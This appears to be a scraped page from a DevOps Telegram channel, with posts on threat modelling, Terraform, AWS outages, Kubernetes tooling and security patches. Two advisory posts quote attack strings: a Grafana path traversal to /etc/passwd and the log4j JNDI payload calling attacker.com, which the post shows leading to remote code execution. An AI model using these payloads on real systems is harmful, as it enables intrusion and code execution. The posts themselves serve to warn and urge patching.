CatOps
5.08K subscribers
94 photos
5 videos
19 files
2.57K links
DevOps and other issues by Yurii Rochniak (@grem1in) - SRE @ Preply && Maksym Vlasov (@MaxymVlasov) - Engineer @ Star. Opinions on our own.

We do not post ads including event announcements. Please, do not bother us with such requests!
Download Telegram
A short but insightful article on how to perform threat modelling by GitLab

I covers some basics like building diagrams as well as describes popular STRIDE framework for threat modelling.

STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Rrepudiation - Claiming to have not performed an action
- Information disclosure -Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization

Here you can find a bit more detailed description for each area with some examples.

P.S. In general, GitLab has a lot of great documentation and blog posts in free access, not only on security or operational topics but on various work aspects. I strongly suggest checking out their handbook. Maybe, you can find there some guidance on topics that are important for you at the moment.

#security
I'm a bit hesitant of posting hot news, because there are usually people, who do that faster than me.

This one is worth mentioning, though. Grafana fixed 0-day vulnerability that was discovered yesterday.

Vulnerability in nutshell, in case you've missed it. You were able to access restricted locations with a query like this one:
 /public/plugins/<PLUGIN>/../../../../../../../etc/passwd


Versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!

#security
Astrologists declare a week of application delivery.

So today, I want to share with you an article that touches the problem of delivering infrastructure dependencies in the modern world.

The problem statement is that almost no applications are running purely on their own. Especially, if we're talking about corporate backend services. These applications require databases, queues, blob storage and many more dependencies to run correctly.

Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics. It likely doesn't have much sense from a business point of view. On another hand, creating a separate team to provide dependencies on-demand literally brings us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.

In this article, an author argues that bundling application dependencies alongside with the codebase is the best way to go. One can have a team that delivers these building blocks and a developer then combine them like a Lego in their config files.

This is a very interesting approach (at least for me) and I truly believe that this would be the next big thing in DevOps-ish world. As for now, though, an author mentions a few tools that could help here. However, in my humble opinion, an existing toolset is not quite there yet and there is still a long way to go.

P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts with on this topic. Stay tuned!

#app_bundle #kubernetes #crossplane
​​TF 1.1.0 was released, and maybe the most interesting feature is the ability to force vars to be not-null

 Non-nullable with a default: if left unset, or set explicitly to null, then
# it takes on the default value
# In this case, the module author can safely assume var.d will never be null
variable "e" {
nullable = false
default = "hello"
}

# Non-nullable with no default: variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null
variable "d" {
nullable = false
}


By default, all variables set implicitly to nullable = true.

#terraform
0-day vulnerability found in the popular Java log4j library.

Now, why is it important.

You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.

log4j
is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape, and they write logs, chances are high they use log4j.

The exploit is stupidly silly. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here how it works:

1. Data from the User gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
4. This response contains a path to a remote Java class file (ex. https://second-stage.attacker.com/Exploit.class) which is injected into the server process,
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

It looks like the quickest mitigation is to set -Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10 or re-configure JDK.

Also, check your Java services' logs. Maybe, you already are poisoned.

#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6

These releases contain patches for various security vulnerabilities, including one with High severity.

So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!

#gitlab #security
Amazon has published a public postmortem for the recent issues on Friday. However, it went through a little bit unnoticed because of the Log4j story (see one of the previous posts).

So, the original issue is happened to be a cascading failure, which led to congestion in AWS internal networks. This is an interesting part, because it puts some light on AWS internals.

So, the internal monitoring system as well as parts of control plane for EC2 reside in the internal network, which experienced issues. That's why AWS team was operating with partial visibility of their systems, which impacted the speed of resolution.

Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them, not start a new one. These matters happened to be more critical for certain services within AWS line API Gateways and Amazon Connect.

The interesting thing is that these events were caused by the code that was there for years (according to AWS). Unfortunately, an unexpected behavior was revealed during an automated scaling event.

To mitigate such issues in future, AWS switched off automatic scaling in us-east-1. They claim that they have enough capacity already. As well as they're working on a fix for the part of code that caused the co congestion in the first place. I assume, there are many other internal action items from this outage as well.

#aws #postmortem
​​Last week, I promised a series of posts about modern application delivery. Last time, we briefly discussed the problems that are generated by the disconnection between application code and its infrastructure dependencies.

Today, let's talk about a proposed formal way of solving this issue - Open Application Model. This is a specification of application bundle definition that contains all the required components as well as traits (we'll talk later on this one). The main purpose is to provide a reasonable abstraction for customers. So, they can use components and traits as building blocks for their application's infra dependencies.

This concept was proposed by people from Alibaba Cloud (and Microsoft?) and the whole thing is fairly new. However, it already has an implementation for Kubernetes - KubeVela. Although, I still have unanswered questions for this tool. For example, is it possible to provide default traits? What should I do if I want all my apps to have an autoscaler, etc.?

In any case, those are implementation details. Nothing stops you from embracing concepts of OAM and implementing them using, let's say, Helm.

As a bonus, here is a great video by Viktor Farcic about KubeVela with some basic "Hello world" example. It helps to better understand the problem that OAM is trying to solve as well as its concepts like components, traits and the difference between them. 'Coz the official documentation, let's be honest, is not that great.

https://youtu.be/2CBu6sOTtwk

#oam #app_bundle #kubernetes
I don't know a corresponding idiom in English, so I put it as it is.

Наша пісня гарна й нова - починаймо її знову!

The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.


P.S. If you know the corresponding idiom in English, please, let me know in the chat.

#security
Holiday Book Recommendations by Gergely Orosz - an author of The Pragmatic Engineer blog.

A bit unfortunate for me that this article was published on 17th of December, while I have already bought some engineering books before the end of the year (we have a special budget for that in my company). However, 4 out 5 books I’ve bought are in this list :)
The only exception is Database Internals, but I guess this book is just too specific for a generic IT book recommendation.

So, I hope you can find something interesting for you in this list! There are multiple categories there, from engineering management to technology-specific topics. Also, “The Pragmatic Engineer” is a really cool blog about IT in general as well as some European specifics. I read it myself and can totally recommend it!

Happy upcoming holidays!

#books
​​Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability

Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.

#security
​​Yet another post from the #app_bundle series. This is again a video from Viktor Farcic on how to combine ArgoCD, Crossplane, and KubeVela to completely abstract Kubernetes away from your product engineers aka developers and (allegedly) make their lives easier.

In the end of each year, many people make predictions on what upcoming times would look like. And I can say that abstracting clusters away will be a big thing in the industry. This brings us to the logical question: "So, why do all this stuff and not just use serverless options out of the box?". I will let you answer this question on your own.

P.S. You can save this post to blame me later, if this prediction happens to be wrong.

#kubernetes #cicd
I re-designed my blog not just for the sake of re-designing. At least, I hope so.

So, here is a new article from a wannabe series about Kubernetes.

This series started with a review of Velero backup tool. Now, I want to extend this topic a bit and share my thoughts on whether it makes sense to back up a Kubernetes cluster at all.


P.S. This is the last technical article in my blog this year. I usually do a generic recap of the year, but haven't done one yet. Also, this is the last post in CatOps channel this year.

Wish y'all reliability during the festive season and only five nines in the new year!

#kubernetes #backup #blog
From our subscribers.

People can use AWS Elastic Container Registry to cache public Docker images.

From their press-release:

This new capability gives AWS customers a simple and highly available way to pull Docker Official Images, while taking advantage of the generous AWS Free Tier. Customers pulling images from Amazon ECR Public to any AWS Region get virtually unlimited downloads. For workloads running outside of AWS, users not authenticated on AWS receive 500 GB of data downloads each month. For additional data downloads, they can sign up or sign in to an AWS account to get up to 5TB of data downloads each month after which they pay $0.09 per GB.

If you have any interesting things to share, you can always do it in our chat!

#aws
🔥2
New Year resolutions is a very common practice. I do mine as well, but this time I want to share a review of databases in 2021 with Dr. Andy Pavlo.

Some points from the article:

- RDBMS is an old concept, but it dominates the market even for greenfield projects and it‘s here to stay
- PostgreSQL gains more and more popularity. It might be not the most popular database, but it steadily moving to the top
- “…only old people care about official TPC numbers.”
- More and more money is invested into DB-related startups. Size of each funding series has also increased comparing to previous big takes. ”We are in the golden era of databases. There are so many excellent choices available today. Investors are searching for database start-ups that can become the next Snowflake-like IPO.”
- People have moved away from MapReduce and Hadoop technologies nowadays.
- Larry Ellison - a co-founder of Oracle - is back to the 5th position of the richest persons list

#databases
Once everybody patched their Log4j dependencies and went back from holidays, it's time to process, what just happened.

In his article Professional Maintainers: a Wake-up Call Filippo Valsorda argues that the current open-source model is unsustainable. Thus, the only viable alternative to solve this status-quo, in his onion, is for open-source maintainers to start issuing invoices to companies that require support or new features.

I know that such maintainers already exist, but this is definitely not a common practice.

Anyways, there are so many non-sustainable things in this world and our usual way of solving them is to pretend that they don't exist. So, let this article be just an invitation to think about the current state of affairs.

P.S. If you're a maintainer or a contributor to an open-source project, you're doing a god's work! Thank you!

#open_source #culture
👍6👎1🔥1
​​Yesterday I shared this video in our chat and it looks like people liked it. So, I would like to share it here with the broader audience.

In this video Victor Farcic speaks about AWS Karpenter and its advantages comparing to good old cluster-autoscaler.

A few notable things:
- Karpenter is workload-aware. It means that it can determine, how many resources does your workload needs and scale up a cluster accordingly. So, if you need to place just a tiny pod, you’ll get a smaller node comparing to a situation if you need to run a few heavy tasks
- Karpenter is topology-aware. So, for example, you can schedule nodes for a given workload in a specific AZ only. It’s neat if you use EBS volumes or additional network interfaces
- It’s groupless, meaning that it doesn’t have a concept of “instance groups” like cluster-autoscaler (and many other autoscalers). So, cluster-autoscaler modifies parameters of instance group, Karpenter on another hand talks to AWS APIs directly. In theory, this should reduce scale-up and scale-down times

#kubernetes #aws
​​Morning! New Year - new HUG Kyiv events. Now, with HashiCorp co-founders

What: Q/A session with Mitchell Hashimoto and Armon Dadgar
You can ask and vote for questions via this link.

Who: Mitchell Hashimoto and Armon Dadgar and one of your old friends as moderator ;)

When: Thursday 3rd February, 19:50 (Kyiv TZ)
Where: Online
Language: English

Please, register here

#event
👍3🔥1🎉1
​​Mess with DNS

Julia Evans has built a site where you can do experiments with DNS. It shows you a live stream of all DNS queries coming in for records on the free subdomain provided to you (a “behind the scenes” view).

You can make up your experiments or check out her examples of experiments you can try., including "weird" (when you broke something), "useful" and "tutorial" experiments.

#dns
👍9😱1